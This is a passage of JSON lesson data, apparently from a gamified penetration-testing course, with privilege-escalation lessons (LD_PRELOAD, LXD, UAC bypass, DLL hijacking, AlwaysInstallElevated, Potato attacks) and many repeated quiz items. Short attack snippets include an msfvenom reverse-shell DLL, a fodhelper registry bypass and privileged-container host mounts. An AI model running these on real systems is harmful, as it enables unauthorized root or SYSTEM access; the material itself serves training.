because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"lin-ldpreload","cat":"Privilege Escalation","title":"LD_PRELOAD Injection","diff":2,"xp":175,"intro":"Inject shared libraries.","sections":[{"type":"text","content":"Inject shared libraries."},{"type":"code","lang":"bash","content":"# If sudo keeps LD_PRELOAD:\ngcc -shared -fPIC -o shell.so shell.c -nostartfiles\nsudo LD_PRELOAD=/tmp/shell.so <cmd>"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"LD_PRELOAD does?","opts":["Sets PATH","Loads a library before all others","Changes user","Sets env"],"ans":1},{"type":"quiz","q":"The first command after getting a Linux shell should be...","opts":["rm -rf /","id && whoami","reboot","shutdown"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware samples","Exploitable Unix binaries","Password lists","CVE databases"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"lin-lxd","cat":"Privilege Escalation","title":"LXD/LXC Group","diff":2,"xp":150,"intro":"Abuse LXD group.","sections":[{"type":"text","content":"Abuse LXD group."},{"type":"code","lang":"bash","content":"lxc init ubuntu:18.04 privesc -c security.privileged=true\nlxc config device add privesc root disk source=/ path=/mnt/root"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"LXD group grants?","opts":["Network","Mount host filesystem in privileged container","Database","Web admin"],"ans":1},{"type":"quiz","q":"Windows equivalent of sudo is...","opts":["su","runas","chmod","admin"],"ans":1},{"type":"quiz","q":"What does 'id' command show?","opts":["IP address","User ID, group ID, and groups","System info","Network interfaces"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"win-token","cat":"Privilege Escalation","title":"Windows Token Impersonation","diff":2,"xp":175,"intro":"Impersonate SYSTEM tokens.","sections":[{"type":"text","content":"Impersonate SYSTEM tokens."},{"type":"code","lang":"bash","content":"PrintSpoofer.exe -i -c cmd\nGodPotato.exe -cmd 'cmd /c whoami'"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Required privilege?","opts":["SeDebug","SeImpersonatePrivilege","SeBackup","SeRestore"],"ans":1},{"type":"quiz","q":"LinPEAS is a tool for...","opts":["Web scanning","Linux privilege escalation enumeration","Password cracking","Network sniffing"],"ans":1},{"type":"quiz","q":"The first command after getting a Linux shell should be...","opts":["rm -rf /","id && whoami","reboot","shutdown"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"win-uac","cat":"Privilege Escalation","title":"Windows UAC Bypass","diff":2,"xp":150,"intro":"Bypass User Account Control.","sections":[{"type":"text","content":"Bypass User Account Control."},{"type":"code","lang":"bash","content":"reg add HKCU...ms-settingsShellOpencommand /d cmd.exe /f\nfodhelper.exe"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"UAC protects against?","opts":["Network","Unauthorized privilege elevation","Malware","Data loss"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware samples","Exploitable Unix binaries","Password lists","CVE databases"],"ans":1},{"type":"quiz","q":"Windows equivalent of sudo is...","opts":["su","runas","chmod","admin"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"win-svc","cat":"Privilege Escalation","title":"Windows Service Misconfig","diff":2,"xp":150,"intro":"Exploit writable services.","sections":[{"type":"text","content":"Exploit writable services."},{"type":"code","lang":"bash","content":"accesschk.exe /accepteula -uwcqv Users *\n# Unquoted path: C:Program FilesMy Appsvc.exe"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Unquoted path vuln?","opts":["Missing quotes","Windows searches path segments","Buffer overflow","Registry"],"ans":1},{"type":"quiz","q":"What does 'id' command show?","opts":["IP address","User ID, group ID, and groups","System info","Network interfaces"],"ans":1},{"type":"quiz","q":"LinPEAS is a tool for...","opts":["Web scanning","Linux privilege escalation enumeration","Password cracking","Network sniffing"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"win-dll","cat":"Privilege Escalation","title":"DLL Hijacking","diff":2,"xp":175,"intro":"Plant malicious DLLs.","sections":[{"type":"text","content":"Plant malicious DLLs."},{"type":"code","lang":"bash","content":"# procmon: NAME NOT FOUND + .dll\nmsfvenom -p windows/x64/shell_reverse_tcp -f dll -o hijack.dll"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"DLL search order hijacking?","opts":["Injection","Malicious DLL in earlier search path","Renaming","Deleting"],"ans":1},{"type":"quiz","q":"The first command after getting a Linux shell should be...","opts":["rm -rf /","id && whoami","reboot","shutdown"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware samples","Exploitable Unix binaries","Password lists","CVE databases"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"win-reg","cat":"Privilege Escalation","title":"Windows Registry Exploits","diff":2,"xp":150,"intro":"Registry-based privesc.","sections":[{"type":"text","content":"Registry-based privesc."},{"type":"code","lang":"bash","content":"reg query HKCU...Installer /v AlwaysInstallElevated\nmsfvenom -f msi -o evil.msi\nmsiexec /quiet /qn /i evil.msi"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"AlwaysInstallElevated abuses?","opts":["EXE","MSI packages","DLL","BAT"],"ans":1},{"type":"quiz","q":"Windows equivalent of sudo is...","opts":["su","runas","chmod","admin"],"ans":1},{"type":"quiz","q":"What does 'id' command show?","opts":["IP address","User ID, group ID, and groups","System info","Network interfaces"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"win-potato","cat":"Privilege Escalation","title":"Potato Attacks","diff":3,"xp":200,"intro":"Service account to SYSTEM.","sections":[{"type":"text","content":"Service account to SYSTEM."},{"type":"code","lang":"bash","content":"JuicyPotato.exe -l 1337 -p cmd.exe -t *\nPrintSpoofer.exe -i -c powershell"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Required privilege?","opts":["SeDebug","SeImpersonatePrivilege","SeBackup","SeChangeNotify"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process 